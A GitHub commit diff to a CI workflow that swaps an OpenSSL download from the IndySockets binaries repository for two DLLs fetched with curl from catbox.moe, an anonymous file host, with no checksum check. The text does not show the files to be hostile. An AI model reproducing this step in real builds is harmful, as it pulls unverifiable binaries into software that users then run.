Update main.yml

This commit is contained in:
Sebastian
2022-05-22 10:56:54 -05:00
committed by GitHub
parent 36c1692f96
commit c74221f387

View File

@@ -132,8 +132,8 @@ jobs:
run: |
mkdir OpenSSL
cd OpenSSL
curl -L https://github.com/IndySockets/OpenSSL-Binaries/raw/master/Archive/openssl-1.0.2n-i386-win32.zip -o OpenSSL.zip
unzip OpenSSL.zip
curl -L https://files.catbox.moe/ctwswu.dll -o libeay32.dll
curl -L https://files.catbox.moe/ie9e77.dll -o ssleay32.dll
- name: Build
shell: cmd